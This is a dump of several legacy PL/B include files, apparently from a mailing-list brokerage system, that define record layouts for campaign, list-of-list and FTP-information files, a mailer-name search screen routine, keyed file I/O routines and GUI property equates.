.NCMPFLE2 AFILE FIXED=535,uncomp,Name="NINCMP.AAM|20.20.30.104:502"
NCMPFLE2 AFILE FIXED=535,uncomp,Name="NINCMP.AAM|10.10.30.104:502"
FileListEnd
.>Patch 1.2 End
.END PATCH 1.1 REPLACED LOGIC
NCMPFLD DIM 6 Campaign Number(ISAM)
NCMPFLD1 DIM 48 Campaign Name(AAM)
. NOTE(review): NCMPFLD1 is 48 bytes while the Campaign Name AAM key
. (007-051) is 45 - confirm whether the extra 3 bytes are intentional.
.START PATCH 1.1 REPLACED LOGIC
.NCMPFLD2 DIM 7 Mailer Number(AAM)
.NCMPFLD3 DIM 10 Broker Number/Cnt(AAM)
NCMPFLD2 DIM 9 Mailer Number(AAM)
NCMPFLD3 DIM 12 Broker Number/Cnt(AAM)
.END PATCH 1.1 REPLACED LOGIC
NCMPFLD4 DIM 15 P.O. Number(AAM)
NCMPFLD5 DIM 5 Contact(AAM)
NCMPFLAG FORM 1
.START PATCH 1.1 REMOVED LOGIC
.NCMPFLG2 FORM 1
.END PATCH 1.1 REMOVED LOGIC
NCMPPATH FORM 1
NCMPLOCK FORM 1 0/1=FILEPI, 2=RECORD LOCK, 3=NO LOCK
.
NCMPVARS LIST
NCMPNum DIM 6 001-006 Campaign Number(Key)
NCMPCName DIM 45 007-051 Campaign Name(AAMKey)
.START PATCH 1.1 REPLACED LOGIC
.NCMPMlr DIM 4 052-055 Mailer Number(AAMKey)
.NCMPBrk DIM 4 056-059 Broker Number(AAMKey)
NCMPMlr DIM 6 052-057 Mailer Number(AAMKey)
NCMPBrk DIM 6 058-063 Broker Number(AAMKey)
.END PATCH 1.1 REPLACED LOGIC
NCMPBrkCnt DIM 3 064-066 Broker Contact(AAMKey)
NCMPPO DIM 12 067-078 P.O. Number(AAMKey)
NCMPStat DIM 1 079-079 Campaign Status
.START PATCH 1.1 REPLACED LOGIC
.NCMPShipTo DIM 4 080-083 Ship To Number
NCMPShipTo DIM 6 080-085 Ship To Number
.END PATCH 1.1 REPLACED LOGIC
NCMPDate DIM 8 086-093 Campaign Date
NCMPModDate DIM 8 094-101 Modification Date
NCMPInits DIM 3 102-104 Modification Initials
NCMPCnt DIM 2 105-106 Contact(AAMKey)
NCMPPlanner DIM 2 107-108 Planner
NCMPQty DIM 13 109-121 Gross Campaign Qty
NCMPNetQty DIM 13 122-134 Net Campaign Qty
NCMPRate DIM 6 135-140 Response Rate Change%
NCMPGift DIM 6 141-146 Gift Change%
.----------MASTER FIELDS-----------
NCMPOffer DIM 3 147-149 Master Offer
NCMPMedia DIM 2 150-151 Master Media
NCMPSample DIM 3 152-154 Master Sample
NCMPShip DIM 2 155-156 Master Shipping Method
NCMPKey DIM 12 157-168 Master Key Info
NCMPMDate DIM 8 169-176 Master Mail Date
NCMPRDate DIM 8 177-184 Master Return Date
NCMPCDate DIM 8 185-192 Master Cut-off Date
.
NCMPComment DIM 300 193-492 Special Instructions
NCMPCode DIM 1 493-493 Busy Byte
NCMPBill DIM 1 494-494 Bill Direct Code
NCMPRpt DIM 1 495-495 Projection Report Default
.START PATCH 1.1 REPLACED LOGIC
.NCMPFiller DIM 46 490-535 Filler
NCMPFiller DIM 40 496-535 Filler
.END PATCH 1.1 REPLACED LOGIC
listend
<file_sep>/include/Mlrhelp.inc
; Last change: ML 21 Oct 1998 2:53 pm
.............................................................................
.MLRHELP - AIM SEARCH FOR MAILER.
.
.ENTER WITH - TOPWIND,BOTWIN,LWIND,RWIND - TO DEFINE WINDOW.
.EXIT WITH - MNUM, MCOMP, NEED TO MOVE TO OTHER VARIABLES AND RETURN AT .
. EXIT PARAGRAPH.
.
. 19oct98 change chkkey to chkkeym, changed ntenof to ntenofM
. to avoid duplicate paragraph names
. REVISED TO HANDLE SMALLER WINDOW & USE NMLRIO.INC - JAN/FEB 92 DLH.
.............................................................................
. Validate the caller-supplied window coordinates; if TOPWIND is not a
. usable number (or is zero/empty) fall back to the MSETWIN defaults.
MLRHELP CLEAR STR2
 MOVE TOPWIND TO STR2
 TYPE STR2 *VALID NUMBER?
 CALL MSETWIN IF NOT EQUAL
 CALL MSETWIN IF EOS
 COMPARE C0 TO TOPWIND
 CALL MSETWIN IF NOT GREATER
 DISPLAY *SETSWALL TOPWIND:BOTWIND:LWIND:RWIND;
 move yes to str1
. Ask whether to do a free-float (substring anywhere) search or a
. left-anchored search; str3 carries the search-mode prefix for MLRAKEY
. ("01L" = left-anchored, "01F" = free-float).
 KEYIN *P1:1,*ES:
 *P1:6,*EL,"I WILL HELP YOU FIND THE MAILER NUMBER",*R:
 *P1:6,*EL,"THAT YOU WANT":
 *R,*P1:6:
 *R,*P1:6,"DO YOU WANT A FREE FLOAT SEARCH ? ,":
 *R,*P1:6,"ie: FIND 'AMERICAN' ANYWHERE IN MAILER ":
 *R,*P1:6,"NAME ",*T60,*RV,*UC,STR1;
 CMATCH YES TO STR1
 GOTO FREFLOAT IF EQUAL
 MOVE "01L" TO str3
. Prompt for the mailer name fragment; "*" aborts, "NO" re-prompts.
. The raw entry is saved in STR24 so MCOMP can be restored on exit.
KEYMLR KEYIN *P1:1,*ES,"TYPE IN MAILER NAME : ":
 *P1:2,*DV,MCOMP:
 *P1:2,*T60,*EDIT,MCOMP
 MOVE MCOMP TO STR24
 CMATCH "*" IN MCOMP
 GOTO MLRAEXT1 IF EQUAL
 KEYIN *P1:2,*DV,MCOMP,*P1:3,"OK ? ",*T60,*uc,STR1:
 *P1:3,*EL;
 CMATCH NO TO STR1
 GOTO KEYMLR IF EQUAL
 CMATCH B1 TO MCOMP
 GOTO ntenofM IF EQUAL
 GOTO ntenofM IF EOS
. Build the AIM search key: free-float searches pad with Question marks.
 MATCH "01L" TO str3
 GOTO PACKM1 IF EQUAL
 PACK MLRAKEY FROM str3,MCOMP
 CALL CHKKEYM
 GOTO MLREADA
PACKM1 PACK MLRAKEY FROM str3,MCOMP,Question,Question,Question
 CALL CHKKEYM
 GOTO MLREADA
FREFLOAT MOVE "01F" TO str3
 GOTO KEYMLR
. First AIM read; OVER set means no match, so restore the typed name.
MLREADA
 CLEAR MNUM
 MOVE "*****NO MNUM FOUND*****" TO MCOMP
 CALL NMLRAIM
 IF OVER
 MOVE STR24 TO MCOMP
 GOTO MLRAEXIT
 ENDIF
 MOVE MNUM TO STR4
 GOTO DISMLRA
. Reject keys with fewer than 6 significant characters.
CHKKEYM MOVELPTR MLRAKEY TO n2
 GOTO ntenofM IF ZERO
 COMPARE C6 TO n2
 GOTO ntenofM IF LESS *NOT ENOUGH INFO, LET THEM KNOW
 RETURN *OK, RETURN
. Forward read: keep reading until MNUM changes (skip duplicate hits).
MLREADA1 CLEAR MNUM
 MOVE "*****NO MNUM FOUND*****" TO MCOMP
 CALL NMLRKG
 IF OVER
 MOVE STR24 TO MCOMP
 move b1 to mfax
 GOTO MLRAEXIT
 ENDIF
 MATCH MNUM TO STR4
 GOTO MLREADA1 IF EQUAL
 MOVE MNUM TO STR4
 GOTO DISMLRA
. Backward ("Prior") read - only attempted when PC is zero.
MLREADA2 CLEAR MNUM
 MOVE "*****NO MNUM FOUND*****" TO MCOMP
 IFZ PC
 CALL NMLRKGP
 XIF
 IF OVER
 MOVE STR24 TO MCOMP
 GOTO MLRAEXIT
 ENDIF
 MATCH MNUM TO STR4
 GOTO MLREADA2 IF EQUAL
 MOVE MNUM TO STR4
 GOTO DISMLRA
. Show the current hit and let the user step forward, step back (P,
. only when PC is zero), or end with "*".
DISMLRA DISPLAY *P1:11,*EL,"##",MNUM," ",MCOMP;
 ENDSET MCOMP
 IFZ PC
 KEYIN *P1:6,"ENTER TO CONTINUE, (P)rior (*) TO END",*T254,*uc,STR1;
 XIF
 IFNZ PC
 KEYIN *P1:6,"ENTER TO CONTINUE (*) TO END",*T254,*uc,STR1;
 XIF
 CMATCH STAR TO STR1
 GOTO MLRAEXT1 IF EQUAL
 CMATCH "P" TO STR1
 GOTO MLREADA2 IF EQUAL
 GOTO MLREADA1
.............................................................................
ntenofM DISPLAY *P1:24,*BLINKON,*HON,*EL,"NOT ENOUGH INFO TO SEARCH",*w,*b:
 *HOFF;
 GOTO MLRHELP
.............................................................................
. Normal exit: MNUM cleared and OVER set so the caller can tell nothing
. was selected; MLRAEXT1 is the shared screen-restore exit.
MLRAEXIT
 clear mnum
 MOVE YES TO OVER
MLRAEXT1 DISPLAY *P1:1,*ES,*RESETSW:
 *P20:24,*HON,"ENTER (*) TO EXIT, (<) TO BACKUP":
 " or (?) FOR HELP",*HOFF;
. MOVE STR24 TO MCOMP
 RETURN
................
MSETWIN MOVE "18" TO TOPWIND NO VALUES GIVEN,SET TO DEFAULTS
 MOVE C24 TO BOTWIND
 MOVE "40" TO LWIND
 MOVE C80 TO RWIND
 RETURN
............................................................................
<file_sep>/include/nloldd.inc
...................................................
.
. NLOLDD INCLUSION
. NIN supplemental (List of List) ORDER FILE DEFINITION
.
. FILE NAME : NINLOL.DAT
. REC LENGTH: 516 FIXED
. INDEX KEY : (1) 003-008 (LOL Number- Hidden value!!!)
. (2) 009-014 (Campaign Number)
.
. AAM KEYS : (1) 009-020 (Campaign Number + List Number)
. (2) 021-026 (LR/LCR Number)
. (3)
. (4)
. (5)
.
.; PATCH 1.1 DMB 18JUN2005 Changed IP of File Manager
. NINLOL List-of-List file: two ISAM paths plus one AAM path, 516-byte
. fixed records, 6-byte ISAM keys.  The active INITs address file manager
. NINS1:502 (Patch 1.1); the prior hard-coded IP declarations are kept
. below as comments.
NLOLNAME DIM 28
.>Patch 1.1 Begin
.NLOLNME INIT "NINLOL.ISI|20.20.30.103:502 "
NLOLNME INIT "NINLOL.ISI|NINS1:502 "
.NLOLNME1 INIT "NINLOL1.ISI|20.20.30.103:502"
NLOLNME1 INIT "NINLOL1.ISI|NINS1:502"
.NLOLNME2 INIT "NINLOL.AAM|20.20.30.103:502"
NLOLNME2 INIT "NINLOL.AAM|NINS1:502"
.>Patch 1.1 End
.NLOLNME INIT "NINLOL.ISI "
.NLOLNME1 INIT "NINLOL1.ISI"
.NLOLNME2 INIT "NINLOL.AAM "
NLOLFILE IFILE KEYLEN=6,FIXED=516
NLOLFLE1 IFILE KEYLEN=6,FIXED=516
NLOLFLE2 AFILE FIXED=516
. Key work fields: NLOLFLD = hidden LOL number key, NLOLFLD1 = campaign
. number key, NLOLFLD2/NLOLFLD3 = AAM keys.
NLOLFLD DIM 6 LOL Number(ISAM) Hidden value!!!
NLOLFLD1 DIM 6 Campaign Number(ISAM)
NLOLFLD2 DIM 15 Campaign Number + List Number(AAM)
NLOLFLD3 DIM 9 .OBSOLETE. LR Number(AAM)
NLOLFLD4 DIM 9
.NLOLFLD4 DIM 15 P.O. Number(AAM)
.NLOLFLD5 DIM 5 Contact(AAM)
NLOLFLAG FORM 1
NLOLFLG1 FORM 1
NLOLFLG2 FORM 1
NLOLPATH FORM 1
NLOLLOCK FORM 1 0/1=FILEPI, 2=RECORD LOCK, 3=NO LOCK
.
NLOL2 DIM 2 Used to Extract first 2 bytes
NLOL24 DIM 24 Used to Extract next 24 Bytes(ALL Keys!!) w/o destroying preserved values
. Record layout, positions 001-516.  Replaced field versions (NLOLUniverse,
. NLOLPrice, the old filler) remain as comments; NLOLFiller keeps the
. record at 516 bytes - resize it if any field changes width.
NLOLVARS LIST
NLOLCode DIM 1 001-001 Code for Busy byte
NLOLStat DIM 1 002-002 LOL Status
NLOLLOL DIM 6 003-008 LOL Number - Hidden value!!!!!
NLOLCNum DIM 6 009-014 Campaign Num(Key + AAMKey 1)
NLOLList DIM 6 015-020 List Number(Key + AAMKey 1)
NLOLLCR DIM 6 021-026 Associated LR Number(AAMKey 2) - created from this record
NLOLOwner DIM 4 027-030 Owner Number
NLOLSelect DIM 35 031-065 Select
.NLOLUniverse DIM 9 066-074 List Universe
NLOLUniverse DIM 10 066-075 List Universe - OBSOLETE AFTER DATACARD CONVERSION
NLOLDate DIM 8 076-083 Record Date
NLOLModDate DIM 8 084-091 Modification Date
NLOLInits DIM 3 092-094 Modification Initials
NLOLQty DIM 9 095-103 Quantity
NLOLNetQty DIM 9 104-112 Net Quantity
NLOLTest DIM 1 113-113 Test/Continuation ' '/0=Cont 1=Test, 2=Retest
NLOLRent DIM 1 114-114 Exchange/Rent 1=Exchange, 2=Rent, 3=Exchange/Rent
.NLOLPrice DIM 6 114-119 Average Price per Thousand
NLOLPrice DIM 7 115-121 Average Price per Thousand
NLOLNet DIM 6 122-127 Average Net %
NLOLRate DIM 6 128-133 Response Rate Change %
NLOLGift DIM 6 134-139 Gift Change %
NLOLNetReq DIM 6 140-145 Net Requested %
NLOLNetApp DIM 6 146-151 Net Approved %
NLOLRegional DIM 1 152-152 Regional
.----------VARIANCE FIELDS----------- CAMPAIGN WILL CONTAIN MASTER
NLOLOffer DIM 3 153-155 Offer
NLOLSample DIM 3 156-158 Sample
NLOLPackage DIM 2 159-160 Package
NLOLMDate DIM 8 161-168 Mail Date
.
NLOLComment DIM 150 169-318 Internal Special Instructions - copies over to NINSPEC1.DAT when Order record created
NLOLComment1 DIM 150 319-468 External Special Instructions
NLOLLR DIM 6 469-474 LR Master record - used to create this record
.LOLFiller DIM 44 473-516 Filler
NLOLFiller DIM 42 475-516 Filler
listend
<file_sep>/include/SRDSTXTIO.inc
..............................................................................
.******************************************************
.* SRDSTXT List FILE DESCRIPTORS.
.. ....................................................
.* ****************************************************
.* SRDSTXT DATACARD FILES.
.* ****************************************************
.
...............................................
. ENTRY POINT : SRDSTXTKEY
. REQUIRED : 'SRDSTXTFld'
. RETURNED : RECORD
. DESCRIPTION : EXACT ISAM KEY READ
. APPLICATION'S RESPONSIBILITY TO TEST FLAGS
.
. Exact-key read.  SRDSTXTPATH selects main file (SRDSTXTFile/SRDSTXTFld)
. vs alternate file (SRDSTXTFle1/SRDSTXTFld1); the file is opened lazily
. on first use via SRDSTXTFlag.  FILEPI holds the file for the read.
SRDSTXTKEY Branch SRDSTXTPATH TO SRDSTXT1a,SRDSTXT1c
SRDSTXT1a BRANCH SRDSTXTFlag TO SRDSTXT1b
 CALL SRDSTXTOpen
SRDSTXT1b FILEPI 1;SRDSTXTFile
 READ SRDSTXTFile,SRDSTXTFld;SRDSTXTVars
 RETURN
SRDSTXT1c BRANCH SRDSTXTFlag TO SRDSTXT1d
 CALL SRDSTXTOpen
SRDSTXT1d FILEPI 1;SRDSTXTFle1
 READ SRDSTXTFle1,SRDSTXTFld1;SRDSTXTVars
 RETURN
..............................................................................
.
. ENTRY POINT : SRDSTXTTST
. REQUIRED : SRDSTXTFld
. RETURNED :
. DESCRIPTION : TEST KEY
.
. Key-existence test: same path/lazy-open pattern as SRDSTXTKEY, but the
. record is read into scratch STR1 instead of SRDSTXTVars, so only the
. flags are affected.
SRDSTXTTST Branch SRDSTXTPATH TO SRDSTXT2a,SRDSTXT2c
SRDSTXT2a BRANCH SRDSTXTFlag TO SRDSTXT2b
 CALL SRDSTXTOpen
SRDSTXT2b FILEPI 1;SRDSTXTFile
 READ SRDSTXTFile,SRDSTXTFld;STR1
 RETURN
SRDSTXT2c BRANCH SRDSTXTFlag TO SRDSTXT2d
 CALL SRDSTXTOpen
SRDSTXT2d FILEPI 1;SRDSTXTFle1
 READ SRDSTXTFle1,SRDSTXTFld1;STR1
 RETURN
..............................................................................
.
. ENTRY POINT : SRDSTXTKS
. REQUIRED :
. RETURNED : SRDSTXT Main Record
. DESCRIPTION : KEY SEQUENTIAL MDC MainFILE READ
.
. Key-sequential read; SRDSTXTPATH selects main vs alternate file with
. lazy open, mirroring SRDSTXTKEY/SRDSTXTTST.
. FIX: SRDSTXT3c formerly branched to SRDSTXT3b when the file was already
. open, so the alternate path read the MAIN file (SRDSTXTFile) instead of
. SRDSTXTFle1.  It now branches to SRDSTXT3d like its siblings (1c->1d,
. 2c->2d).
SRDSTXTKS Branch SRDSTXTPATH TO SRDSTXT3a,SRDSTXT3c
SRDSTXT3a BRANCH SRDSTXTFlag TO SRDSTXT3b
 CALL SRDSTXTOpen
SRDSTXT3b FILEPI 1;SRDSTXTFile
 READKS SRDSTXTFile;SRDSTXTVars
 RETURN
SRDSTXT3c BRANCH SRDSTXTFlag TO SRDSTXT3d
 CALL SRDSTXTOpen
SRDSTXT3d FILEPI 1;SRDSTXTFle1
 READKS SRDSTXTFle1;SRDSTXTVars
 RETURN
..............................................................................
. ENTRY POINT : SRDSTXTSEQ
. REQUIRED :
. RETURNED : SRDSTXT Main Record
. DESCRIPTION : SEQUENTIAL MDC MainFILE READ
.                APPLICATION'S RESPONSIBILITY TO TEST FLAGS
.
. Physical-sequential read.  NOTE(review): unlike the keyed entries this
. routine has no SRDSTXTPATH branch - it always reads the main
. SRDSTXTFile; confirm the alternate path is intentionally unsupported.
SRDSTXTSEQ BRANCH SRDSTXTFlag TO SRDSTXT4
 CALL SRDSTXTOpen
SRDSTXT4 FILEPI 1;SRDSTXTFile
 READ SRDSTXTFile,SEQ;SRDSTXTVars
 RETURN
..............................................................................
.
. ENTRY POINT : SRDSTXTWRT
. REQUIRED : 'SRDSTXTFld'
. RETURNED :
. DESCRIPTION : EXACT ISAM KEY TXT/ISI INSERT
.
. Insert SRDSTXTVars through the FileList so every member file is
. updated together; lazy open via SRDSTXTFlag, FILEPI for the write.
SRDSTXTWRT BRANCH SRDSTXTFlag TO SRDSTXT5
 CALL SRDSTXTOpen
SRDSTXT5 FILEPI 1;SRDSTXTFlist
 WRITE SRDSTXTFlist;SRDSTXTVars
 RETURN
..............................................................................
.
. ENTRY POINT : SRDSTXTUPD
. REQUIRED : A PREVIOUS KEY READ
. RETURNED :
. DESCRIPTION : KEY UPDATE MDC MainFILE
.
. Rewrite the record positioned by a previous key read, through the
. FileList so all member files stay in step.
SRDSTXTUPD BRANCH SRDSTXTFlag TO SRDSTXT6
 CALL SRDSTXTOpen
SRDSTXT6
 FILEPI 1;SRDSTXTFlist
 UPDATE SRDSTXTFlist;SRDSTXTVars
 RETURN
..............................................................................
.
. ENTRY POINT : SRDSTXTDEL
. REQUIRED : 'SRDSTXTFld'
. RETURNED :
. DESCRIPTION : EXACT ISAM KEY TXT/ISI DELETE
.
. Delete the record identified by SRDSTXTFld, through the FileList so
. the deletion hits every member file.
SRDSTXTDEL BRANCH SRDSTXTFlag TO SRDSTXT7
 CALL SRDSTXTOpen
SRDSTXT7 FILEPI 1;SRDSTXTFlist
 DELETE SRDSTXTFList
 RETURN
..............................................................................
.
. ENTRY POINT : SRDSTXTOpen
. REQUIRED : 'SRDSTXTFlag' 'SRDSTXTPATH'
. RETURNED      : 'SRDSTXTFlag' SET TO '1' IF OPENED
. DESCRIPTION : OPEN NIN MDC MainFILE
. DISPLAY ERROR AND ABORT IF NOT ON-LINE.
.
. Open the FileList once; an I/O error during OPEN is trapped to
. SRDSTXTGONE (which reports the missing file).  On success the trap is
. cleared and SRDSTXTFlag is set to 1 so callers skip reopening.
SRDSTXTOpen TRAP SRDSTXTGONE giving error IF IO
 OPEN SRDSTXTFList
 TRAPCLR IO
 MOVE C1 TO SRDSTXTFlag
 RETURN
..............................................................................
. I/O-error trap target: hand the file name to the common FILEGONE
. handler.  No RETURN here - per the header, FILEGONE is expected to
. display the error and abort (confirm FILEGONE never returns).
SRDSTXTGONE MOVE SRDSTXTNAME TO FILENAME
 CALL FILEGONE
.
..............................................................................
<file_sep>/include/nftpdd.inc
.//******************************************************
.// NFTPDD INCLUSION
.// SUBSIDIARY FILE FOR DATACARD
.// ADDRESSING FILE DESCRIPTOR.
.//****************************************************
.// NAMES IN THE NEWS MASTER ADDRESSING FILE.
.//****************************************************]
.// FILE: NINFTP
.// LENGTH: 1024
.// TYPE: SEQ
......................................................
. NINFTP FTP-information file: ISAM + AAM pair on file manager NINS1:502,
. 1024-byte records, 9-byte key (company number + site counter).
NFTPNAME INIT "NINFTP"
NFTPFLD DIM 9
NFTPFLD1 DIM 9
NFTPLOCK FORM 1 .0 OR 1=filepi,2=recordlock, 3=no lock
NFTPFLAG FORM 1
NFTPPATH FORM 1
NFTPFILE FILE
NFTPFLIST FILELIST
NFTPFILE1 IFILE KEYLEN=9,Name="NINFTP.isi|NINS1:502"
NFTPFLE2 AFILE Name="NINFTP.aam|NINS1:502"
FILELISTEND
.Note description should have no spaces so Winbatch FTP jobs process records correctly when using (Parse)
.//FTP Information File - NINFTP
. Field offsets: positions derived from the DIM sizes; record totals
. 1024 bytes (6+3+100+50+255+255+255+15+85).
NFTPCOMP DIM 6 .Eventually Fulfillment Company Number .1-6
NFTPCOMPID DIM 3 .Counter for multiple sites .7-9
NFTPDESC DIM 100 .Company Description .10-109
NFTPPROTOCOL DIM 50 .FTP/FTPS .110-159
NFTPADDRESS DIM 255 .Ftp Address .160-414
NFTPUSERNAME DIM 255 .User Name .415-669
NFTPPASSWORD DIM 255 .Password .670-924
.begin patch
NFTPIP Dim 15 .IP address xxx.xxx.xxx.xxx .925-939
NFTPFILLER Dim 85 .Filler .940-1024
.NFTPFiller DIM 100 .Filler .925-1024
.end patch
.//Varlist NFTP
NFTPVARS VARLIST NFTPCOMP:
 NFTPCOMPID:
 NFTPDESC:
 NFTPPROTOCOL:
 NFTPADDRESS:
 NFTPUSERNAME:
 NFTPPASSWORD:
 NFTPIP:
 NFTPFiller
<file_sep>/include/PLBEQU.INC
*==============================================================================
. GUI designer support equates
.
. Last Revision Date: 22 Apr 1997
.
. Revision History:
.
.:: 15 Jan 97 - Create PLB equate include definitions. :8.1
.:: 06 Feb 96 - Added ICON to APPEARANCE property. :8.1
.:: - Added GROUPID to DROPID property. :8.1
.:: - Added SHAPE to BGCOLOR and BDRCOLOR properties. :8.1
.:: 25 Feb - Added LINKHSCROLL and LINKVSCROLL. :8.1
.:: 05 Mar - Added AUTOSCALE, PICTSIZEH, PICTSIZEV, and WINPOS. :8.1
.:: 02 Apr - Changed EDITTYPE to use DECIMAL and INTEGER :8.1
.:: 22 Apr - Added LINE object. :8.1
.:: - Added X1, X2, Y1, and Y2 properties for LINE object. :8.1
.::
.
*------------------------------------------------------------------------------
. General Usage Equates
.
. Shared on/off/none values referenced by the property notes below.
$ON EQU 1
$OFF EQU 0
$NONE EQU 0
.
*------------------------------------------------------------------------------
. Event Type Indicators
.
. Event type codes (see "Event Type Indicators" header above).
$LOAD EQU 0
$ACTIVATE EQU 1
$DEACTIVATE EQU 2
$CHANGE EQU 3
$CLICK EQU 4
$CLOSE EQU 5
$DBLCLICK EQU 6
$DRAGDROP EQU 7
$DRAGOVER EQU 8
$GOTFOCUS EQU 9
$KEYPRESS EQU 10
$LOSTFOCUS EQU 11
$MOVE EQU 12
$MOUSEDOWN EQU 13
$MOUSEUP EQU 14
$MOUSEMOVE EQU 15
$PAINT EQU 16
$RESIZE EQU 17
$TIMER EQU 18
$OLDEVENT EQU 19
$FORMINIT EQU 20
.
*==============================================================================
. Object Properties
.
*------------------------------------------------------------------------------
. ALIGNMENT=dnumnvar CREATE SETPROP GETPROP
.
. Description:
. The ALIGNMENT property defines how the text is to be output
. horizontally for the object.
.
. Note1: The EDITTEXT object doesn't support changing of this property
. using the SETPROP statement.
.
. Objects:
. EDITTEXT
. STATTEXT
.
. dnumnvar values:
.
.$NONE EQU 0 // Default
. ALIGNMENT property values ($NONE=0 is the default, commented above).
$CENTER EQU 1
$LEFT EQU 2
$RIGHT EQU 3
.
*------------------------------------------------------------------------------
. APPEARANCE=dnumnvar CREATE SETPROP GETPROP
.
. Description:
. The APPEARANCE property specifies when an object should
. have a 3D look or a non-3D look. This property should replace
. the STYLE property for these objects. If this property is
. not specified, the default appearance is determined by the
. current SETMODE *3D state. If the SETMODE *3D state has not
. been specified, then the appearance defaults to be the same
. as defined for the window.
.
. Note: Under Windows95 these objects always have a 3D presentation
. regardless of the control value provided.
.
. Objects:
. CHECKBOX
. CHECKGRP
. COMBOBOX
. DATALIST
. ICON
.       POPUPMENU (OBSOLETE)
. RADIO
. RADIOGRP
. WINDOW
.
. dnumnvar values:
.
. APPEARANCE property values.
$3D EQU 1
$FLAT EQU 2
.
*------------------------------------------------------------------------------
. AUTOREDRAW=dnumnvar CREATE SETPROP GETPROP
.
. Description:
. When this property is set to zero, then the repainting of the
. object is disabled. When this property is set to one, then the
. repainting of the objects takes place as normal.
.
. Objects:
. COMBOBOX
. DATALIST
.       POPUPMENU (OBSOLETE)
. WINDOW
.
. dnumnvar values:
.
.$OFF EQU 0
.$ON EQU 1 // Default
.
*------------------------------------------------------------------------------
. AUTOSCALE=dnumnvar CREATE SETPROP GETPROP
.
. Description:
. This property specifies how a picture should be scaled to fit
. pict object rectangle coordinates. This property is overridden
. by the RESIZE property.
.
. Objects:
. PICT
.
. dnumnvar values:
.
.$NONE EQU 0
. AUTOSCALE property values ($SCALEBEST is the default).
$SCALEBEST EQU 1 // Default
$SCALEHORZ EQU 2
$SCALENONE EQU 3 // Same as RESIZE=$OFF
$SCALEVERT EQU 4
.
*------------------------------------------------------------------------------
. AUTOSIZE[=dnumnvar] CREATE SETPROP GETPROP
.
. Description:
. This property defines if the bottom border is to be adjusted
. automatically to fit the number of items specified. If the
. AUTOSIZE property is not specified the default action is to
. not resize the bottom border. If the AUTOSIZE property is
. specified without an assignment, the action is the same as
. if AUTOSIZE=1 where given.
.
. Objects:
. CHECKGRP
. RADIOGRP
.
. dnumnvar values:
.
.$OFF EQU 0 // Default
.$ON EQU 1
.
*------------------------------------------------------------------------------
. AUTOZOOM[=dnumnvar] CREATE SETPROP GETPROP
.
. Description:
.       This property enables or disables the zooming capability for
.       a pict object.
.
. Objects:
. PICT
.
. dnumnvar values:
.
.$OFF EQU 0 // Default
.$ON EQU 1
.
*------------------------------------------------------------------------------
. BACKSTYLE=dnumnvar CREATE SETPROP GETPROP
.
. Description:
. This property defines the type of background to be used for
. supported objects. The BACKSTYLE can be OPAQUE which prevents
. underlying objects from showing through this object. The can
. BACKSTYLE can also be TRANSPARENT which allows underlying
. objects to show through the supported objects.
.
. Objects:
. GROUPBOX
. SHAPE
. STATTEXT
.
. dnumnvar values:
.
.$NONE EQU 0 // Default
. BACKSTYLE property values.
$OPAQUE EQU 1
$TRANSPARENT EQU 2
.
*------------------------------------------------------------------------------
. BDRCOLOR=dnumnvar|color object CREATE SETPROP GETPROP
.
. Description:
. This property allows the color of the BORDER to be specified by
. the user program. If the BDRCOLOR parameter is a <color object>,
. then the <color object> must be created before it is used. The
. <dnumnvar> value can also be used to specify the color as a
. RGB value or a Windows system color index. The <dnumnvar> value
. can be thought of as 4 byte values. When the high order byte
. contains a value of 0x00, then the next 3 bytes (24 bits) get
. interpreted as a RGB value. When the high order byte has a value
. of 0x80, then the lower order byte is used as an index value into
. the Windows System colors. The Windows system colors can be
. defined by the user under Windows 95 and Windows NT.
.
. Index Value Meaning
.
. COLOR_ACTIVEBORDER Active window border.
. COLOR_ACTIVECAPTION Active window caption.
. COLOR_APPWORKSPACE Background color of multiple
. document interface (MDI) applications.
. COLOR_BACKGROUND Desktop.
. COLOR_BTNFACE Face shading on push buttons.
. COLOR_BTNSHADOW Edge shading on push buttons.
. COLOR_BTNTEXT Text on push buttons.
. COLOR_CAPTIONTEXT Text in caption, size box,
. and scroll bar arrow box.
. COLOR_GRAYTEXT Grayed (disabled) text.
. This color is set to 0 if the
. current display driver does not
. support a solid gray color.
. COLOR_HIGHLIGHT Item(s) selected in a control.
. COLOR_HIGHLIGHTTEXT Text of item(s) selected in a control.
. COLOR_INACTIVEBORDER Inactive window border.
. COLOR_INACTIVECAPTION Inactive window caption.
. COLOR_INACTIVECAPTIONTEXT Color of text in an inactive
. caption.
. COLOR_MENU Menu background.
. COLOR_MENUTEXT Text in menus.
. COLOR_SCROLLBAR Scroll bar gray area.
. COLOR_SHADOW Color of automatic window shadows.
. COLOR_WINDOW Window background.
. COLOR_WINDOWFRAME Window frame.
. COLOR_WINDOWTEXT Text in windows.
.
.
. Objects:
. STATTEXT
. GROUPBOX
. PROGRESS
. CHECKGRP
. EDITTEXT
. LINE
. MOVIE
. PICT
. RADIOGRP
. SHAPE
.
. dnumnvar values:
.
. Windows system color indexes: 0x80000000 (high-order byte 0x80) plus
. the COLOR_* index described in the table above.
$SCROLLBAR CONST "2147483648" ;Hex value 0x80000000
$BACKGROUND CONST "2147483649" ;Hex value 0x80000001
$ACTIVECAPTION CONST "2147483650" ;Hex value 0x80000002
$INACTIVECAPTION CONST "2147483651" ;Hex value 0x80000003
$MENU CONST "2147483652" ;Hex value 0x80000004
$WINDOW CONST "2147483653" ;Hex value 0x80000005
$WINDOWFRAME CONST "2147483654" ;Hex value 0x80000006
$MENUTEXT CONST "2147483655" ;Hex value 0x80000007
$WINDOWTEXT CONST "2147483656" ;Hex value 0x80000008
$CAPTIONTEXT CONST "2147483657" ;Hex value 0x80000009
$ACTIVEBORDER CONST "2147483658" ;Hex value 0x8000000A
$INACTIVEBORDER CONST "2147483659" ;Hex value 0x8000000B
$APPWORKSPACE CONST "2147483660" ;Hex value 0x8000000C
$HIGHLIGHT CONST "2147483661" ;Hex value 0x8000000D
$HIGHLIGHTTEXT CONST "2147483662" ;Hex value 0x8000000E
$BTNFACE CONST "2147483663" ;Hex value 0x8000000F
$BTNSHADOW CONST "2147483664" ;Hex value 0x80000010
$GRAYTEXT CONST "2147483665" ;Hex value 0x80000011
$BTNTEXT CONST "2147483666" ;Hex value 0x80000012
$INACTIVECAPTIONTEXT CONST "2147483667" ;Hex value 0x80000013
$BTNHIGHLIGHT CONST "2147483668" ;Hex value 0x80000014
.
*------------------------------------------------------------------------------
. BDRPATTERN=dnumnvar CREATE SETPROP GETPROP
.
. Description:
. This property allows the user to specify the type of border
. pattern is to be used for the object. The possible border
. patterns are as follows:
.
. Dash - Pen is dashed.
. DashDot - Pen has alternating dashes and dots.
